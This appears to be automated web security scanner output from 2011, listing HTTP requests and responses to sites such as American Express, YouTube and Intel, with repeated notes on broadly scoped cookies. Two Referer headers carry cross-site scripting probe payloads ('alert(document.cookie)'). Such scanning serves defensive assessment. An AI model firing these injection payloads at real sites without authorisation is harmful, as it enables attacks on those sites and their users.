GET /pixel?id=1012&r=1&nocb=1 HTTP/1.1 Host: www.wtp101.com Proxy-Connection: keep-alive Referer: http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=aarp.thehartford.com,foxnews8.com,carinsuranceweb.com,geinterestplus.com,digestaqure.com&p=0.000700179100183313&url=http%3A%2F%2Fhomeappliance.manualsonline.com%2Fex%2Fmfg%2Fheadline%2Fm%2Fariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281%2Fd%2Ftype%2Fproduct_problem&cbb=0x5FAA34DC317211E0BEB038273F87B1CA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: synced=!adnexus!yahoo!openx!google; tuuid=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, must-revalidate Content-Type: text/html; charset=UTF-8 Date: Sat, 05 Feb 2011 21:54:21 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Location: http://www.googleadservices.com/pagead/conversion/1024474926/?label=4q4iCODn3QEQrv7A6AM&guid=ON&script=0 P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Pragma: no-cache Set-Cookie: tuuid=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; path=/; expires=Mon, 04 Feb 2013 21:54:21 GMT; domain=.wtp101.com Set-Cookie: s=!1012; path=/; expires=Mon, 04 Feb 2013 21:54:21 GMT; domain=.wtp101.com Content-Length: 0 Connection: keep-alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.yigg.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /americanexpress HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 22:21:11 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: VISITOR_INFO1_LIVE=c_sXjcA9xII; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 22:21:11 GMT Set-Cookie: GEO=8c13c5354668e4ba32fe1a481a49181ccwsAAAAzVVOtwdbzTU3NVw==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Content-Length: 0 Cache-Control: no-cache Location: http://www.youtube.com/das_captcha?next=/americanexpress Content-Type: text/html; charset=utf-8 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/208T0-OLXA8 HTTP/1.1 Host: www.youtube.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/5aWd_-x1oPE HTTP/1.1 Host: www.youtube.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE; use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; GEO=c0f1d1d2c857cb01c350c8b8c68c361ecwsAAAAzVVOtwdbzTU3HFg==;
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 22:41:33 GMT Server: wiseguy/0.6.7 Content-Length: 0 X-Content-Type-Options: nosniff Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Tue, 02-Feb-2021 22:41:33 GMT Set-Cookie: GEO=f3452e70229898077c07f3ed5215d0bccwsAAAAzR0KtwdbzTU3SHQ==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=CrHMDXZiHhCUCPfGVgtkSCBPdNSPzrhpn39-4I0L1XlfYvtYQ65-g8BaNDzM0uvf0Fn3FBlNQPxx3x8F51dId1BM4l3GLR1CUlZRwARyBvuJGEH6uebWuDte2Mspaox32XrVLifz_DSu13T18jAndZqkw6SyNqAbodrsRXwistnr1fL1DI8fql0wyuEPVqwachJzW5W5oAHj0CE2z2KGV7SaDdqUzk0et3zj0IK7NUi1JP6mtyX9fWBLma2l7pFTLElmp2bI20SHDgKHyDO-_DvZr5Ok3mm6IbRA8SgfJ0OhiLACa3Jf-A Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tpv/?11259580C1463786597S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault&zanpid=14786739C435671106T1469378458521060355 HTTP/1.1 Host: www.zanox-affiliate.de Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 06 Feb 2011 17:39:22 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://www.zanox-affiliate.de/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Set-Cookie: zttpvc=5C2945S1469387008513466368T0I11259580C0SV1LJMVy4dqmqo38356976y83y85qeyq140ya19ya5954s92yb3930ybbq71alyc3rq790phesxabzugyddydfT0; domain=.zanox-affiliate.de; path=/ Set-Cookie: zptpvc=5C2945S1469387008513466368T0I11259580C0SV1LJMVy4dqmqo38356976y83y85qeyq140ya19ya5954s92yb3930ybbq71alyc3rq790phesxabzugyddydfT0; expires=Sat, 07-May-2011 17:39:22 GMT; domain=.zanox-affiliate.de; path=/ Content-Length: 0 Location: http://www.active-srv02.de/werbemittel/WebObjects/werbemittel.woa/wa/ads?apid=1198bf95-a2d2-4954-bf8c-6a476a8fb377&zanpid=11259580C1463786597S14786739T1469387008513466368&zanpartner=1049301 pragma: no-cache cache-control: no-store
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /consumertravel/travel.do HTTP/1.1 Host: www134.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-card-travel-insurance/home.do?source=footer_prem_services HTTP/1.1 Host: www152.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/ HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789?inav=menu_cards_sbc_comparecards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:41 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944501386119; path=/; expires=Tue, 09-Feb-16 22:21:41 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000q3QZbDYOcyvtP0PZminOCss:1115nbtvb;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 200661
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/business-solutions/overview HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:44 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944504607994; path=/; expires=Tue, 09-Feb-16 22:21:44 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000kscO5hdpunXSAOCMFtkSRfr:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 40955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/find-business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:35 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944495304108; path=/; expires=Tue, 09-Feb-16 22:21:35 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000JTfdlyvElahRUmUBPW_Sr5S:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 83384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/see-all-business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:42 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944502510060; path=/; expires=Tue, 09-Feb-16 22:21:42 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000yq-Xh-WxMu4vUVCexozgN5B:1115nbtvb;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 78468
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/ HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:27 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944487071298; path=/; expires=Tue, 09-Feb-16 22:21:27 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000rksCcDlHmzQipsUe7BzBjnC:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/home?sj_tabToOpen=1&inav=menu_cards_pc_choosecard HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:23 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944483932373; path=/; expires=Tue, 09-Feb-16 22:21:23 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000oFplttRUbELe348jm0hGGKR:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MobileWeb/index.jsp HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:06 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944526576342; path=/; expires=Tue, 09-Feb-16 22:22:06 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0001PGzoPxDqqpRWVuPalmTJrf8:11m1380s8;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 33070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /PowerLabsWeb/un/landingpage.htm HTTP/1.1 Host: www213.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:33 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944613478399; path=/; expires=Tue, 09-Feb-16 22:23:33 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=00000YZCQTdcKvGRMYP-Rq79eWY:129nma7r7;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 81548
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/home.do HTTP/1.1 Host: www217.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/shopping/index.jsp HTTP/1.1 Host: www217.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26A6E87F85163F0C-400001824071395A[CE]; Expires=Thu, 4 Feb 2016 22:36:47 GMT; Domain=.intel.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/intelcorp,intelappdeveloper,intelcorpsw/1/H.20.3/s73248818481806?AQB=1&ndh=1&t=5/1/2011%2016%3A34%3A7%206%20360&ce=UTF-8&pageName=sw%3Ajoin&g=http%3A//appdeveloper.intel.com/en-us/join&r=http%3A//burp/show/22&cc=USD&ch=sw&events=event5%2Cevent9&c1=app%20developer&h1=sw%7Capp%20developer%7Cen-us%7Cuser%7Cjoin%7Chome&c2=en-us&c3=user&v3=sw%3Ajoin&c4=asmo-na&v4=http%3A//appdeveloper.intel.com/en-us/join&c5=en-us&v6=app%20developer&c7=intelappdeveloper%2Cintelcorpsw&v7=en-us&c8=http%3A//appdeveloper.intel.com/en-us/join&v8=user&c9=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D&c13=Version%204.3&c14=sw%3Ajoin&c16=First%20Visit&v16=First%20Visit&c17=new&v17=new&c25=user&v28=http%3A//appdeveloper.intel.com/en-us/join&c43=user%7Cjoin%7Chome&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: www91.intel.com Proxy-Connection: keep-alive Referer: http://appdeveloper.intel.com/en-us/join Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296945247431; s_lv_s=First%20Visit; cf=1
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:36:47 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26A6E87F85163F0C-400001824071395A[CE]; Expires=Thu, 4 Feb 2016 22:36:47 GMT; Domain=.intel.com; Path=/ Location: http://www91.intel.com/b/ss/intelcorp,intelappdeveloper,intelcorpsw/1/H.20.3/s73248818481806?AQB=1&pccr=true&vidn=26A6E87F85163F0C-400001824071395A&&ndh=1&t=5/1/2011%2016%3A34%3A7%206%20360&ce=UTF-8&pageName=sw%3Ajoin&g=http%3A//appdeveloper.intel.com/en-us/join&r=http%3A//burp/show/22&cc=USD&ch=sw&events=event5%2Cevent9&c1=app%20developer&h1=sw%7Capp%20developer%7Cen-us%7Cuser%7Cjoin%7Chome&c2=en-us&c3=user&v3=sw%3Ajoin&c4=asmo-na&v4=http%3A//appdeveloper.intel.com/en-us/join&c5=en-us&v6=app%20developer&c7=intelappdeveloper%2Cintelcorpsw&v7=en-us&c8=http%3A//appdeveloper.intel.com/en-us/join&v8=user&c9=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D&c13=Version%204.3&c14=sw%3Ajoin&c16=First%20Visit&v16=First%20Visit&c17=new&v17=new&c25=user&v28=http%3A//appdeveloper.intel.com/en-us/join&c43=user%7Cjoin%7Chome&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3.1 Expires: Fri, 04 Feb 2011 22:36:47 GMT Last-Modified: Sun, 06 Feb 2011 22:36:47 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www418 Content-Length: 0 Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blank.gif HTTP/1.1 Host: yasnide.ivwbox.de Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: srp=17834d4ee7b34e7c0006; i00=17834d4ee7b34e7c0006
Response
HTTP/1.1 200 OK Server: s2.30.1 Date: Sun, 06 Feb 2011 18:25:55 GMT Last-Modified: Tue, 22 Aug 2000 15:05:01 GMT P3P: policyref=http://p3p.infonline.de/p3p.xml, CP=NOI DSP NID PSAa OUR NOR UNI COM NAV Set-Cookie: srp=17834d4ee7b34e7c0006; path=/ Set-Cookie: i00=17834d4ee7b34e7c0006; path=/; domain=.ivwbox.de; expires=Monday, 06-Feb-2012 18:25:55 GMT Content-Length: 43 Content-Type: image/gif
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/ivw/CP/hp-ano;?r=http%3A//burp/show/101&d=25333.629501983523 HTTP/1.1 Host: yasnide.ivwbox.de Proxy-Connection: keep-alive Referer: http://www.yasni.de/?46fac%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee05d79885fa=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 FOUND Server: s2.30.1 Date: Sun, 06 Feb 2011 18:25:55 GMT Last-Modified: Tue, 22 Aug 2000 15:05:01 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Expires: Tue, 22 Aug 2000 15:05:01 GMT P3P: policyref=http://p3p.infonline.de/p3p.xml, CP=NOI DSP NID PSAa OUR NOR UNI COM NAV Set-Cookie: srp=17834d4ee7b34e8c0006; path=/ Set-Cookie: i00=17834d4ee7b34e8c0006; path=/; domain=.ivwbox.de; expires=Monday, 06-Feb-2012 18:25:55 GMT Location: /blank.gif Content-Length: 1 Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: ypn-js.overture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:52 GMT Set-Cookie: BX=as8qm3d6krjfo&b=3&s=48; expires=Tue, 05-Feb-2013 20:00:00 GMT; path=/; domain=.overture.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Wed, 27 Aug 2008 22:13:17 GMT Accept-Ranges: bytes Content-Length: 3298 Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8
<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head><title>Yahoo!</title><meta name="ROBOTS" content="NOINDEX" /><style> /* nn4 hide */ /*/*/ body { ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1/vibrantmedia/RadioshackLeadQ1/201101Q1/1/1/1${TIMESTAMP}@x90 HTTP/1.1 Host: zap.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:23:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Pragma: no-cache Cache-control: no-cache Set-Cookie: OAX=rcHW801NzfgADyjj; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com Set-Cookie: NXCLICK2=011PlqXoNX_vibrantmedia/RadioshackLeadQ1/201101Q1/1/1/1${TIMESTAMP}!y!90!1zvpE!1qKxJ; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com Location: http://t.mookie1.com/t/v1/imp?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58835998;235229178;40346350&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://ad.doubleclick.net/ad/N3867.8763.VIBRANTMEDIAINC/B5178582;sz=1x1;ord=2112748198? Content-Length: 533 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_d15efm_qppm_iuuq=ffffffff09499e5745525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://t.mookie1.com/t/v1/imp?migAgencyId=43&am ...[SNIP]...
XARAYASID=m37gsp1a4komn8m06toh36i5v4; expires=Wed, 06 Feb 2036 04:23:55 GMT; path=/; domain=.splunk.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: zh-hans.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
XARAYASID=s9ut7nium0d0lodm593iqgkh82; expires=Wed, 06 Feb 2036 04:23:57 GMT; path=/; domain=.splunk.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: zh-hant.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
s_vi_kxxwwupgxxbspbtx7Dxxx7Ft=[CS]v4|26A7502D850131A3-40000101003A95D2|4D4EA057[CE]; Expires=Fri, 5 Feb 2016 13:21:31 GMT; Domain=.2o7.net; Path=/
